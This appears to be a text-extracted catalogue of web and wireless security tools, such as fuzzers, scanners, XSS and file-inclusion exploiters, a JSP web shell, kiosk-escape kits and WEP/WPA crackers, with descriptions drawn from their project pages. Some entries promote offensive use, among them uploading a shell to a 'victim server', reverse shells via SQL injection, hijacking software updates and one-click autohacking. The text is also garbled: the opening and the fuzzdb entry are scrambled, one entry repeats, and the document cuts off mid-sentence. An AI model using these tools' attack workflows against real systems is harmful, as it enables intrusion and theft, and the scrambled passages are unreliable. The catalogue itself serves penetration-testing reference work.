Encode/Decode functionality added . portable application that offers stable web protocol fuzzing capabilities. and it's time for eve ryone to demand a more secure web.jar fuzzing API library Release Notes (2.jbrf within your working directory.Removed the default addition of line feeds at the end of each request. by sniffing on a network.3): Multiple instances can now save data in different launch directories. Its purpose is to provide a single. It does so. L inux support is on the way.You can load your custom payloads by placing a file called fuzzers.JBroFuzz now logs into daily log (thnx Ranulf!) .

html Mantra is a dream that came true. Payloads * The payloads tab is a collection of fuzzers with their corresponding payloads that can be used while fuzzing.com/index. This tab is provided. an indication of further examination being required. it creates the malformed data for each request. It is portab le. It is a collection of free and open source too ls integrated into a web browser. Headers * The headers tab is a collection of browser headers that can be used while fuzz ing. Here you can access java runtime information. Headers are obtained from different browsers on different platforms and ope rating systems. LFImap http://code. penetrati on testers. Payloads are added to the request in the fuzzing tab.google. as many web applications respond different ly to different browser impersonation attacks. Depending on the fuzzer payloads selected. Graphing * The graphing tab is responsible for graphing (in a variety of forms) the respo nses received while fuzzing. This tab can offer a clear indication of a response that is different then the rest received. how they are grouped and what properties each fuzzer has can be seen in this tab. responsible for all fuzzing opera tions performed over the network. security professionals etc. which can become handy for students. see any errors that might occur and also t rack operation in terms of events being logged.getmantra. Functions * * * * * * Automatically find the root of the file system Detect default files outside of the web folder Attempts to detect passwords inside the files Supports basic authentication Can use null byte to bypass some controls Writes a report of the scan to a file Mantra http://www. ready-to-run. web application developers. a more clear view of what payloads are available.Fuzzing * The fuzzing tab is the main tab of JBroFuzz.com/p/lfimap/ This script is used to take the highest beneficts of the local file include vuln erability in a webserver A new simple tool was released recently which focuses purely on LFI attacks. Mantra is a security framework which can be very helpful in performing a . System * The system tab represents the logging console of JBroFuzz at runtime. puts it on the wire and writes the response to a file. compact and follows the true spirit of free and open source so ftware.

escalation of privileges. Mantra is absolutely free of cost and takes no t ime for you to set up. flexible. scanning and enumeration . portable and user friendly with a nice graphical user interface. automatically detecting forms w ithin given URL. implements the generic HTTP DoS attack via l ong form field submissions. The attack's theory is described in the following pa per: http://www. maintaining access. Sahi is a tester friendly tool. Mantra is lite.com/p/r-u-dead-yet/ R-U-Dead-Yet. Sahi injects javascript int o web pages using a proxy and the javascript helps automate web applications. SAHI http://sahi. It can also be installed on to your system within minutes. etc. platform and browser independence. the tool offers unattended e xecution by providing the necessary parameters within a configuration file.mavitunasecurity.com/ Netsparker® can find and report security issues such as SQL Injection and Cross-si te Scripting (XSS) in all web applications regardless of the platform and the te chnology they are built on.org/images/4/43/Layer_7_DDOS. excellent Java interaction and inbuilt reporting. multi-threaded playback. It abstracts out most difficulties that testers face while automating web applications. no waits. Netsparker http://www. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensi ve security related tasks. no XPaths. Features * * * * * * * * * * Browser and Operating System independent Powerful recorder which works across browsers Powerful Object Spy Intuitive and simple APIs Javascript based scripts for good programming control Version Controllable text-based scripts In-built reports In-built multi-threaded or parallel playback of tests Tests do not need the browser window to be in focus Command line and ant support for integration into build processes .Y for short.co.in/w/ Sahi is an automation tool to test web applications. CD/DVDs. You can carry it in memory cards. It can be run natively on Linux. and allowing the user to choose which forms and form fields are desirable to use for the POST attack.D.google.owasp.ll the five phases of attacks including reconnaissance. and covering tra cks. Windows and Mac platforms.U. Netsparker's unique detection and exploitation techniques allows it to be dead a ccurate in reporting hence it's the first and the only False Positive Free web a pplication security scanner R U Dead Yet http://code.pdf This tool runs with an interactive console menu. gaining access. flash drives. Some salient features include excellent recorder. or R. In addition.

Note that this is not the sa me as switching between domains. Download it and have a look for yourself! WSFuzzer http://www. Watcher provides pen-testers hot-spot detection for vulnerabilities. and to automate. Please view WSFuzzer as a tool to augment analysis performed by competent and knowledgable professionals.com. multi-process scanning technologies with the incredibly fast LUA language to perform remote web application security scans. In the current version HTTP based SOAP services are the main target. File upload itself works fine Sandcat http://www. Ability to invoke any Java library from scripts Limitations * Framesets/pages with frames/iframes loading pages from multiple domains is not supported. written in Python. — Read more Watcher http://websecuritytool.the most featurerich and advanced web application security scanner available to date. 401 & NTLM authentications Supports browser popups and modal dialogs Supports AJAX and highly dynamic web applications Scripts very robust Works on applications with random auto-generated ids Very lightweight and scalable Supports data-driven testing. traditional Web technologies. HTTPS.* * * * * * * * Supports external proxy.codeplex. Can connect to database.syhunt.com page. So you cannot have a page from goog le. It looks for issues related to mashups. shared hosting. .com/?n=Sandcat. This tool was created based on. that currently targets Web Serv ices. Sandcat combines Syhunt's state-of-the-art.0 technologies suc h as AJAX. enabled us to deliver exactly what we set out to provide . where you navigate from a google. some real-world manual SOAP pen test ing work. While spidering a web site and hunting vulnerabilities. it’s completely safe to use in C loud computing. emerging Web 2.Sandcat Our in-depth understanding of security issues. and dedicated hosting environments. comments. cookies.owasp. developers quick sanity checks. Sandcat emulates a modern. * File upload field will not be populated on browsers for javascript verificatio n. Excel or CSV file. user-controlled payloads (potential XSS).com page to a yahoo. Sahi cannot handle pages which have other pages from different domai ns embedded in them using iframes or frames. Bein g passive means it won’t damage production systems. Watcher dete cts Web-application security issues as well as operational configuration issues.com/ Watcher is a runtime passive-analysis tool for HTTP-based Web applications. WackoPicko https://github. which will work in Sahi.com/adamdoupe/WackoPicko WackoPicko is a vulnerable web application used to test web application vulnerab ility scanners. and Web programming languages such as P HP. Web Services are not trivial in nature so expert ise in this area is a must for proper pen testing. HTML 5-aware web browser. This tool is NOT meant to be a replacement for solid manual human anal ysis.com having an iframe with a page from yahoo. and auditors PCI compliance auditing.php/Category:OWASP_WSFuzzer_Project WSFuzzer is a LGPL'd program.org/index.

WebC ruiser is also an automatic SQL injection tool. WebScarab is able to intercept both HTTP and HTTPS communication.com/p/websecurify/ Websecurify Security Testing Framework identifies web security vulnerabilities b y using advanced browser automation. a compact but powerful web security scan ning tool that will aid you in auditing your site! It has a Vulnerability Scanne r and a series of security tools. XPath Injection et c.owasp. all owing the operator to review and modify requests created by the browser before t hey are sent to the server. In its most common usage.google. and more WebCruiser http://sec4app. * Post Data Resend. * MySQL/DB2/Access: Union/Blind Injection. XPath Injection etc. xpcshell.HTTP headers. discovery and fuzzing technologies.org/index. Flash.0 security initiative specializing in researching s ecurity issues and building the next generation of tools to defeat and protect w eb technologies. XPath Injection etc . a XPath injection tool. WebScarab has several modes of operation. and a Cr oss Site Scripting tool! Function: * Crawler(Site Directories And Files). WebScarab operates as an intercepting proxy. * Auto Get Cookie From Web Browser For Authentication. Cross Site Scripting. Unicode. Websecurity http://code. and to review and modify responses returned from the server before they are received by the browser.Web Vulnerability Scanner. The fra mework is written in JavaScript and successfully executes in numerous platforms including modern browsers with support for HTML5. * Oracle: Union/Blind/CrossSite Injection. implemented by a number of plu gins. * Vulnerability Scanner(SQL Injection.com/ WebCruiser .com/p/webscarab-ng/ http://www.php/OWASP_WebScarab_NG_Project WebScarab-NG is a complete rewrite of the old WebScarab application. * POC(Proof of Concept): SQL Injection.). Silverlight. Java. xulrunner. * Time Delay For Search Injection. and is thus portable to many pla tforms. Cross Site Scripting. It is written in Java. with a spec ial focus on making the application more user-friendly. “Websecurify is a web and web2. V8 and others. WebScarab NG https://code. * Administration Entrance Search. So.. It can support scanning website as well as POC( Prooving of concept) for web vul nerabilities: SQL Injection. SSL. * GET/Post/Cookie Injection. The operator can also review the conversation s (requests and responses) that have passed through WebScarab.” . * SQL Server: PlainText/Union/Blind Injection. * Report Output. referrer leaks. Cross Site Scripting.google. WebScarab is a framework for analysing applications that communicate using the H TTP and HTTPS protocols. information disclosure.

acunetix. XSSploit http://www. This file cont ains the file extensions on the server that should be spidered. XSSploit comes with several files : .htm Acunetix Web Vulnerability Scanner (WVS) is an automated web application securit y testing tool that audits your web applications by checking for exploitable hac king vulnerabilities. To add a new ext ension. The vulnerabilities that have been discovered can then be exploited using the ex ploit generation engine of XSSploit.net/ XSSer is an open source penetration testing tool that automates the process of d etecting and exploiting XSS injections against different applications. Please refer to this file to create new e xploits. Put this file in the same folder as the XML report and point your browser to the report file to see the report.This version contains the following improvements: * * * * * * * * * * Users interface improvements Faster.html XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python.py: The GUI interface. and various specia l techniques of code injection.exploits.ch/pages_en/xssploit. acunetix http://www.txt: XSSploit’s spider crawls web pages using REGEXPs. Automated scans may be supplemented and cross-checked with .com/cross-site-scripting/scanner.extensions. more stable testing platform Improved extension development API Less false-positives Significant testing performance gains Automatic taking of vulnerability screenshots Integration with the Websecurify Network Improved fuzzing strategies Workspace perspectives Integrated application and extension automatic updates XSSer http://xsser.sourceforge.py: The main file. This extensible functionality allows choosi ng the desired exploit behaviour and automatically generates the corresponding H TML link embedding the exploit payload.report.xml: The exploits database. When used against a website. It then analyses these forms to automatically detect exis ting XSS vulnerabilities as well as their main characteristics.scrt. Contains the XSSploit core and the command line in terface. Don’t forget the dot.gui. . . . . It contains several options to try to bypass certain filters.xssploit. XSSploit first crawls the whole website and identif ies encountered forms.xsl: This stylesheet is a very basic example on how to display the repo rt generated by XSSploit. It has been developed to help discovery and exploitation of XSS vulne rabilities in penetration testing missions. simply add a new line in this file and write your extension.

fimap sho uld be something like sqlmap just for LFI/RFI bugs instead of sql injection. resources such as ally located in a small number e of these. predictable loc ations. fuzzdb is a database attack patterns known t o have caused exploit conditions in the past.the variety of manual tools to allow for comprehensive web site and web applica tion penetration testing.google. audit. makes brute force fuzz testing a scalpel-li . and error messages for intelligent brute force testing and exploit condi tion identification of web applications. It' s currently under heavy development but it's usable. and "fiddle" with incoming or outgoing data. categorized by attack type. small number of server types.com/p/fuzzdb/ fuzzdb is a comprehensive set of known attack pattern sequences. set b reakpoints. It is meant for penetration testers to quickly and eas ily determine if enabled DAV services are exploitable.google. fimap http://http://code. platforms. exploit and even g oogle automaticly for local and remote file inclusion bugs in webapps. Mozilla Firefox. Many mechanisms of attack used to exploit different web server platforms and app lications are triggered by particular meta-characters that are observed in more than one product security advisory. Opera.fiddler2. Fiddler includes a powe rful event-based scripting subsystem. fuzzdb http://code. DAVTest supports: * * * * * * Automatically send exploit files Automatic randomization of directory to help hide files Send text files and try MOVE to executable name Basic and Digest authorization Automatic clean-up of uploaded files Send an arbitrary file fiddler http://www. Fiddler allows you to inspect all HTTP(S) traffic.com/p/fimap/ fimap is a little python tool which can find.NET languag e. The goal of fimap is to improve the quality and security of your website. and the n (optionally) uploading files which allow for command execution or other action s directly on the target. and application.google. and thousands more. platfo rm. and can be extended using any . sorted by platform ke approach. A comprehensive databas type. and pack logfiles and administrative directories are typic of predictable locations. Fiddler is freeware and can debug traffic from virtually any application.com/fiddler2/ Fiddler is a Web Debugging Proxy which logs all HTTP(S) traffic between your com puter and the Internet. includ ing Internet Explorer. Because of the popularity of a age formats. prepare. davtest http://code.com/p/davtest/ DAVTest tests WebDAV enabled servers by uploading test executable files.

svg. blog posts. It provides a console inte rface that allows traffic flows to be inspected and edited on the fly. iExploder http://code. chances are tha t you will like iExploder. png. as well as locate backtr ace information mitmproxy http://mitmproxy. gif. fuzzdb contains lists of error messages to be pattern matched against server output in order to aid detection s oftware security defects. wav.google. jpg. It feeds the browser under consideration with bad HTML and CSS code. articles. tiff. It has been designed to run for hours. with the same functionality b ut without the frills. snd. iExploder is available as a full-featured bro wser harness. Think tcpdump for HTTP. ogg. Features * * * * Intercept and modify HTTP traffic on the fly Save HTTP conversations for later replay and analysis Replay both HTTP clients and servers Make scripted changes to HTTP traffic using Python . mailing list threads patterns gleaned from other open source fuzzers and pentest tools analysis of default app installs system and application documentation error messages It's like a non-automated scanner without the scanner. ico. buffer overflow. It continuously feeds browsers bad data in the ho pe that they will eventually crash. so as to te st its stability and security. Webkit and other browsers supp ort * Basic fuzzing for media formats (bmp. jng. xbm. Primary sources used for attack pattern research: * * * * * * * researching old web exploits for repeatable attack strings scraping scanner patterns from http logs various books.Since system errors contain predictable strings. intercepting HTTP proxy. with the ability to resume (sequential only) * Tools to help isolate which test crashed the browser. mitmdump is the command-line version of mitmproxy. xpm) * Very basic DOM manipulation fuzzing via JS * HTTP header fuzzing * CSS Selector fuzzing * Logic. It is inspired from mangleme another similar tool to find security and reliability problems in web browsers. A few of its features are: * Tests all HTML and CSS attributes that Mozilla.com/p/iexploder/ If you like to fuzz-force your way into finding vulnerabilities.org/ mitmproxy is an SSL-capable. and format string testing * An unlimited amount of repeatable tests * Sequential and random testcase testing. standalone webserver or CGI script. or ev en days until the browser crashes.

. This may include session data bypa ssing protection mechanisms for Cross-Site Request Forgery. WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only WATOBO works like a local proxy.net/apps/mediawiki/watobo/index.The tool will generate proof of concept CSRF HTML given an HTTP request.* SSL interception certs generated on the fly monkeyfist http://hexsec. w3af http://w3af. . . The project's goal is to c reate a framework to find and exploit web application vulnerabilities that is ea sy to use and extend. They are used to collect useful information. during a scan. also known as a one-click attack or session riding a nd abbreviated as CSRF (sea-surf) or XSRF. e. Active checks instead will produce a high number of requests (depending on the c heck module) because they do the automatic part of vulnerability identification.The tool will then create an HTML corresponding to the type of the request. pinata http://code. We are convinced that the sem i-automated approach is the best way to perform an accurate audit and to identif y most of the vulnerabilities. e.google. No additional requests are sent to the (web) application. is a type of malicious exploit of a w ebsite whereby unauthorized commands are transmitted from a user that the websit e trusts. Additionally. .g. Cross-site request forgery.com/misc/monkeyfist/ MonkeyFist is a tool that creates dynamic request forgeries based on cross-domai n data leakage. Overview: . Passive checks are more like filter functions.The GET CSRF HTML includes IMG tag with SRC set to the URL being tested. email or IP addresses.sourceforge. Paros or BurpSuite. It wi ll automatically check whether it is a GET or a POST request and with further va lidation for standard POST and Multipart/form POST.g.The POST CSRF HTML is created with auto submit java script form with names and values from the HTTP request. Pinata is a Python Script that will generate Proof of Concept CSRF HTM L from HTTP request. similar to Webscarab.xml file and sends it to the user's browser.net/ w3af is a Web Application Attack and Audit Framework. WATOBO supports passive and active checks. watobo http://sourceforge.php?title=Main_Page WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. The tool then constructs a payload based on data in the payloads .com/p/pinata-csrf-tool/ Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTT P request. Passive checks will be performed during normal browsing activit ies.

HTML Forms. * It’s short. email or IP addresses. e. * Simple. .sourceforge.500 characters. It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell. Optionally. * Just copy paste the payload. webinject http://www. you can change the payload. PHP.google. Active checks instead will produce a high number of requests (depending on the c heck module) because they do the automatic part of vulnerability identification. WebInject can be used as a complete test framework that is controlled by the Web Inject User Interface (GUI). and can be used as a test harness to create a suite of [HTTP level] autom ated functional. WATOBO works like a local proxy.com/p/webraider/ WebRaider is a plugin based automated web application exploitation tool which fo cuses to get a shell from multiple targets or injection point. you don’t need a tool you can do it manually by using your browser or a simple MITM proxy. * Doesn’t require any application on the target system like FTP. Getting a reverse shell from an SQL Injectio n with one request without using an extra channel such as TFTP. e. Generally not more than 3. AJAX. TFTP or debug. CGI. Additionally. Servlets. * CSRF(able). WATOBO supports passive and active checks. WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only. Passive checks will be performed during normal browsing activit ies. REST. Paros or BurpSuite. during a scan.webinject. * It’s not fixed. etc). acceptance. XML/SOAP Web Services. They are used to collect useful information. It can be used to test individual system components that have HTTP interfac es (JSP. FTP to upload th e initial payload. No additional requests are sent to the (web) application. A test harness allows you to run many test cases and collect/report your results. Idea of this attack is very simple. ASP.watobo http://watobo. and regression tests. it can be used as a standalone test run ner (text/console application) which can be integrated and called from other tes t frameworks or applications.g. WebInject offers real-time results display and may also be used for monitoring system response times. webraider http://code. Passive checks are more like filter functions. * Easy to automate.org/ WebInject is a free tool for automated testing of web applications and web servi ces.exe . We are convinced that the sem i-automated approach is the best way to perform an accurate audit and to identif y most of the vulnerabilities. * It’s only one request therefore faster.g. similar to Webscarab.net/ WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits.

and it injects special Unicode characters and encodings to identify where XSS filters might be bypassed. best-fit map. the ASCII < is 0x3C normally and 0xC0 0xBC in nonshortest form UTF-8. as well as the all-new PTW attack. >. or javascript.g.aircrack-ng. lowercase. Normal ize. Traditional test cases . By auto-injecting special character-probes into all inputs x5s can detect where the emitted character may be ill-encoded or tran sformed in a vulnerable way. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted.characters that might uppercase. ". 3.php?id=main Aircrack-ng is an 802. E .characters typically used to test for XSS injection such as <. x5s will not i nject XSS payloads anywhere. The authors use a specific version of Meta sploit. Transformable test cases . Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. the Turkish 'İ' which will lower-case to 'i' in culture-aware software. E. Wireless Airtun-ng http://www. E. Was the emitted output encoded safely or not? Did an injected character transform to something else? x5s does not inject XSS payloads . It injects ASCII to find traditional encoding i ssues.it does not attempt to exploit or confirm an XSS vulnerability. thus making the attack much faster compared to other WEP cracking t . After identifying a hotsp ot it's the tester's job to perform further validation and XSS testing. 2.and ' which are used to control HTML. it merely aims to identify character encoding and t ransformation issues that lead to XSS. or other wise transform to completely different characters.g. The types of test cases that x5s includes: 1. CSS. x5s acts as an assistant to the security tester by speeding up the process of pa rameter manipulation and aggregating the results for quick viewing. This can be done by quickly scanning th e results. which have been designed with the intention of providing quick visual inspection.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. Also note due to the reverse shells and Metasploit components this software will be detected a virus by AV software x5s http://xss. The methodology used by x5s is to inject small prob es which do not constitute a working XSS payload.org/doku. Overlong UTF-8 test cases .Dependencies Internally WebRaider uses Metasploit. It implements the standard FMS attack along with some optimizations like KoreK attacks.com/ x5s is a Fiddler addon which aims to assist penetration testers in finding cross -site scripting vulnerabilities. In other words. It's designed to draw your attention to the fields and parame ters which seem likely candidates for vulnerability. A security-tester would rev iew the results to find issues where special characters were dangerously transfo rmed or emitted without a safe encoding. they trimmed the fat from Metasploit to launch it faster and make it sma ller. You can change the paths and make it work with the latest Metasploit of yo ur own setup.codeplex.g.non-shortest UTF-8 encodings of the 'traditional' test cases noted above.

etc.kismac-ng.remote-exploit. (For example the first h it from "tracert www. a small console program that floods the nearby wireless network wi th packets designed to turn off FireSheep. About 200 is ok for a local route r. Wi-fEye will allow you to perf orm a number of powerful attacks automatically. Aircrack-ng is a set of tools for auditing wireless networks. Wi-fEye is divided to four main menus: .is/~gas15/FireShepherd/ FireShepherd. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. -Know that this is only a temporary solution to the FireSheep problem. Atheros and PrismGT. Ralink rt2570 and rt73 . r econnaissance. (400 is default) -h Shows this message Keykeriki http://www. created t o give people the chance to secure themselves and the others around them from th e current threat. select your target and let Wi-fEye do t he magic! So. and Realtek rtl8187 chipsets are in progress towards full support as well. Wi-fEye http://wi-feye. a repeating module or amplifier Kismac http://trac. you see it is designed to help with network penetration testing. choose which attack to perform. All of the internal AirPort hardware is supported for scanning. Cisco Airone t.ools. FireShepherd http://notendur. making you and the people around you secure from most people using FireSheep.za1d.org/ KisMAC wiki! KisMAC is an open-source and free sniffer/scanner application for M ac OS X. It is designed to be the ultimate point-and-shoot tool. effectively shutting down nearby Fire Sheep programs every 0. PrismII. (A trivial face book server is default) The local router can be found with the tracert command. but the user is still in danger of all other session hijacking mechanisms.google. The hardware itself is designed to be small and versatile. and/or demonstrate the sniffing attacks (for educational pu rpose only). This opensource hardware and sof tware project enables every person to verify the security level of their own key board transmissions.org/?page_id=187 universal wireless keyboard sniffer: Keykeriki. local router is recommended. In fact.html Wi-fEye can be considered as a GUI to almost all tools that we use daily. The program kills the current version of FireSheep running nearby. Optional command line switches: -i *IP* Ip Destination for packets.com") -t *timeout* Timeout in ms for packet sending.5 sec or so. for example. and/or hardware ext ensions. All you have to do is to launch Wi-fEye. it can b e extended to currently undetected/unknown keyboard traffic. Do not do anything over a untrusted network that you cannot share with everyone.hi. USB devices with Intersil Prism2.com/index. KisMAC supports several third party PCMCIA cards: Orinoco. while the security vulnerabilities revealed by FireSheep are b eing fixed.

3. 4. 2. URL sniffing. It can be considered as a simple Python wrapper for different tools. Image sniffing. * Korek Chopchop Attack. Sniff SSL/HTTPS traffic. 4. * Fake Authentication Attack. select a payload. start multi/handler. MITM: This menu will allow you to do the following Automatically: Enable IP forwarding ARP Spoof Launch ettercap (Text mode). Others: This menu will allow you to do the following automatically: Change MAC Address. all you have to do is select the software you want to hijack its update. * Hamster for HTTP session Hijacking * Expect and Evilgrade for software hijacking.py file will help you to integrate the following list of the tools needed for each module: * Aircrack-ng is needed for all the attacks in the cracking menu * Nmap is used in Nmap menu. * Wesside-ng. SSL/HTTPS sniffing. The Wi -fEye. For example. 5. * Msgsnarf to sniff instant messenger’s messages. * Ettercap is very important as it is used in the following attacks: 1. Hijack software updates (using Evilgrade). HTTP Session Hijacking (using Hamster). stop the Apache if it is already running. DNS Spoof. Mapping: This menu will allow you to do the following: Scan the network and view the connected hosts Use Nmap automatically 3. Cracking menu: This menu will allow you to: Enable monitor mode View available Wireless Networks. By now. Launch Airodump-ng on a specific AP WEP cracking: This will allow you to perform the following attacks automatically : * Interactive packet replay. ARP Spoofing. you must have already seen why we said that it is a GUI for different to ols. Sniff images. start the evilgrade webserver and DNS spoof the updates to evilgrade! It’s that simple! WiPhire .1. * Fragmentation Attack. Sniff URLs and send them to browser. s elect the target and that’s it! Wif-Eye will use Metasploit to create and encrypt the agent. if you want to hijack software updates in the network. Sniff messengers from instant messengers. WPA Cracking: This contains the following attacks: * Wordlist Attack * Rouge AP Attack 2. Dns Spoofing. * Hirte Attack (cfrag attack).

and 64-bit PCs. inSSIDer http://www. Windows 7. With inSSIDer. This script was written on Backtrack 4 and designed to be used with Backtrac k 4. still this is worth a mention.metageek.net/products/inssider Genuine geeks.http://sourceforge. It has only two modes: Crack W EP-encrypted access points (routers) and crack WPA-encrypted access points.net/projects/wiphire/ WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easi er. whether professional or casual.google. and auto-selects your cracking method! Pretty much ev erything is done for you. This script needs to be ran as root. We haven’t been able to use this o ne as we have been very busy with various assignments. . If you do not have this chipset but another adap ter that is compatible with the aircrack-ng suite you will need to put it into m onitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. It c an search for new targets. It is written in Java and is intended for use with the Linux Operating Sy stem.com/p/grimwepa/ Consider Grimwepa a front-end to many famous Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) password auditors. need Wi-Fi tools that help troubl eshoot WLAN networks. MetaGeek has created a gift that keeps on g iving. open-source Wi-Fi scanner software. These are the functions of the script: * * * * * * autoMACtic MAC spoofer Ability to crack WEP networks Ability to crack WPA networks Perform simple MITM attacks DNSspoof a network Use airdrop-ng to create a jammer Programs that WiPhire Uses: * * * * * * * * * * * * * * * airmon-ng airodump-ng aireplay-ng aircrack-ng airdrop-ng xterm crunch pyrit sslstrip arpspoof macchanger kate apache2 ettercap Firefox grimwepa http://code. One big difference: inSSIDer act ually works with Windows Vista. But. Our award-winning. more specifically for the BackTrack distro’s. is an al ternative to network scanners like NetStumbler. inSSIDer. Grimwepa is a password cracker for both WEP and WPA-encrypted access points (rou ters). This script was also designed to be used with the Alfa AWUS036H Wireless ad apter with the RTL8187 chipset.

providing nice an alysis of software crashes in a simple form of file names. With 100+ security tools in the repository. Ferret. Channel. but might work on others systems. you truly are our type of geek.3 and higher) How can inSSIDer help me? * Inspect your WLAN and surrounding networks to troubleshoot competing access po ints * Track the strength of received signal in dBm over time * Filter access points in an easy-to-use format * Highlight access points for areas with high Wi-Fi concentration * Export Wi-Fi and GPS data to a KML file to view in Google Earth. also running on Ubuntu 9. Hongfuzz supplies and modifies input to a test program and utilize the ptrac e() API/POSIX signal interface to detect and log crashes. librsvg and libtiff.net/projects/binpack/ BinPack is a portable security environment for Windows. sslstrip) * Hamster credentials (Wifizoo.inSSIDer is FREE. DNS Tu nnel) * Install and Update required software Written for the security disto Backtrack.10.google. open-source Wi-Fi scanning software.com/p/honggfuzz/ Honggfuzz is a general-purpose fuzzing tool. Basically it’s a simple. Features . Wow. It aims to be a multi purpose tool for: * Connect to different access points with different credentials with easy to use config files * Run a evil / rogue access point (Karma. Take a look at the features below to see what makes inSSIDer special. SSID.com/p/ubitack/ This tool automates some of the tasks you might need on a (wireless) penetration test or while you are on the go. It has been used to find a few (possibly exploitable) bugs in some major softwar e packages including freetype2. honggfuzz http://code.google. easy to use via command-line interface. Given a starting corpus of test fil es. Hamster) * Test WEP encryption (Wepbuster) * Set up secure connections in hostile environments (SSH tunnel. Vista and 7 (32 and 64-bit) Wi-Fi API and your current Wireless network card Mac Address. heavily tested on BT4 Final in particu lar. too. you can easily convert any system into a hacking platform in minutes. Karmetasploit) * Sniff credentials (dsniff suite. OpenVPN. RSSI and "Time Last Seen" most GPS devices (NMEA v2. * Filter through hundreds of scanned access points ubitack http://code. And yet you want to know more. binpack http://westcoasthackers. What's Unique about inSSIDer? * * * * Compatible with Uses the Native Sort results by Compatible with Windows XP.

hoping to raise money for a code signing certificate Sadly only two peopl e donated cash (Enrique Exposito Martinez and Gerald Fehringer. more instant “One click magic”. or a browser add-on This allows you to quickl . ptrace) interface under iKAT files or setup necessary — Hongfuzz can run simultaneously for more efficient will use the most powerful process st a given OS. * Powerful analysis capabilities: Hongfuzz ate analysis (e. The ActiveX is signed and provides a mad amount of functionality. More Tools iKAT now contains more tools packaged in different containers. * Fast: Multiple Hongfuzz instances can be fuzzing. iKAT is a website you visit from a Kiosk. what’s more you don’t need to write to the file system. iKAT SilverLight SilverLight (and mono) are now supported by iKAT. file formats.cked. you guys rock) L uckily a Kiosk vendor was willing to come to the party and donate the remaining cash.* Easy setup: No complicated configuration be run directly from the command line. iKAT features many methods of escaping out of a browser jail ed environment and gaining command execution. more URI’s. Whats New in iKAT v3 Signed Code All iKAT tools. More WMI! iKAT ActiveX A newly developed ActiveX which focuses on Windows Shell hacking and process spa wning. This tool should be (and is) used by Kiosk vendors/developers/su ppliers to test the security of their own Kiosk products. VBScripts. I also a dded support some of the more interesting Microsoft based URI handler vulnerabil ities released this year.net/Windows/index. iKAT OfficeKAT Thanks to Didier Stevens who donated his “Excel Spawn CMD in Memory” trick to the iK AT project OfficeKAT allows you to pop shell in environments where you can run E xcel.g. and provide yet another attack vector for your pleasure Improved URI + File Handler Enumeration Vastly improved enumeration code.html iKAT was designed to aid security consultants with the task of auditing the secu rity of a Windows based internet Kiosk terminal. PDF s. More VBScript. All iKAT tools are now signed by a trusted CA. its quick. who kindly donated the remaining money. iKAT now supports over 60 differ ent methods of crashing a browser. iKAT is designed to provide acc ess to the underlying operating system of a Kiosk terminal by invoking native OS functionality. ActiveXs. free. and aims to please. ClickOnce. More Java Applets. Big thanks to Kioware Kiosks.ha. Oddly enough this is also the easiest thing to do to a browser. http://ikat. SilverLight apps are now signed by a trusted CA! Four months ago i placed a “Donate Now” button on the front page of iKAT. Designed as a SaaS. and even silent installers. iKAT is solely developed by myself (Paul Craig) a Kiosk hacking enthusiast from New Zealand. and Emo-Kiosking has become a personal favourite trick of mine. Emo Kiosking – Crashing the Kiosk The fastest way to get out of a browser jail environment is to simply CRASH IT.

Pretend you’re on looking at xterm Where does it work? . Browse to it 3. if any) .Execute arbitrary system commands (it’s a shell. . How do you use it? 1. but I haven’t tested) Why would you use it? .net prn-2-me http://blog. often with only one click required. you need a JSP shell! But there’s one problem: the availab le ones are kind of terrible. embedded with jQuery and everything else you need to make an awesome web shell. Upload it to the victim server (try it on a local Tomcat server!) 2. after all) .co.cked.Works across platform .Dump JNDI entries winautopwn http://winautopwn.Can be also be used to test effectiveness of IDS/IPS .4 too.Browse around the system (as the web application system user) .Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. To use iKat just visit the following URL in a kiosk system browser: http://ikat.y drop back to the desktop.cc/2010/11/23/printer-mitm-revisited-prn-2-me/ PRN-2-me is a simple listener that can be configured to run on any port (default is 9100 for jetdirect style connections).Scans all ports 1 .TXT) . What is it? A single JSP file. The Metasploit reverse shell is only intended to s erve as placeholder for an already-owned box.Launched exploits are independent and don't rely on service fingerprinting (to avoid evasion.Works on Java 1.5+ (probably 1.65535 after taking the IP address and tries all possible e xploits according to the list of discovered open ports (OpenPorts. script or compile the source codes. The tool will then save all incoming PCL and PostScript print jobs to file and forward them on to the real printer. The world needs a JSP shell that r eally helps a blackbox attacker pivot to important assets.com/?p=191 What do you do when you have an arbitrary file upload to a web-accessible direct ory in J2EE? Obviously.No need to debug.ha. Features : . so I took a stab at i t. .c22. It’s called quite lamely called pwnshell.Doesn't require any Database at the back-end like others . pwnshell http://i8jesus.Show and alter session variables .PortScan is multi-threaded. .nr/ Autohack your targets with least possible interaction.

Immunity Canvas.Can be also be used to test effectiveness of IDS/IPS . Cheat Sheets Common Ports . standalone appli cation which is easy to use and doesn't require a lot of support of other depend encies.65535 after taking the IP address and tries all possible e xploits according to the list of discovered open ports (OpenPorts. Under these circumstances also. Binaries of perl.The aim of creating winAUTOPWN is not to compete with already existing commercia l frameworks like Core Impact (Pro).co.PortScan is multi-threaded. etc. which offer autohacks. Metasploit Framework (free ware). php. but to create a free.Scans all ports 1 .No need to debug. the exploit writer's credits remain intact. . etc. This way the exploit writer's credit and originality is maintained. python and cygwin DLLs (included) are required to exist e ither in a common folder or should be properly installed with their paths regist ered for those exploits which are cannot be compiled into a PE-exe. Also not forgetting that winAUTOPWN unlike other frameworks maintains the origin al exploit writer's source code intact just as it was and uses it. Some anti-viruses might falsely detect the exploits as malicious. if any) The aim of creating winAUTOPWN is not to compete with already existing commercia l frameworks like Core Impact (Pro). Features : . . The source is modified on ly when required to enable a missing feature or to remove hard-coded limitations . Newer exploit modules are added as and when they release and older ones are also being daily added. which offer 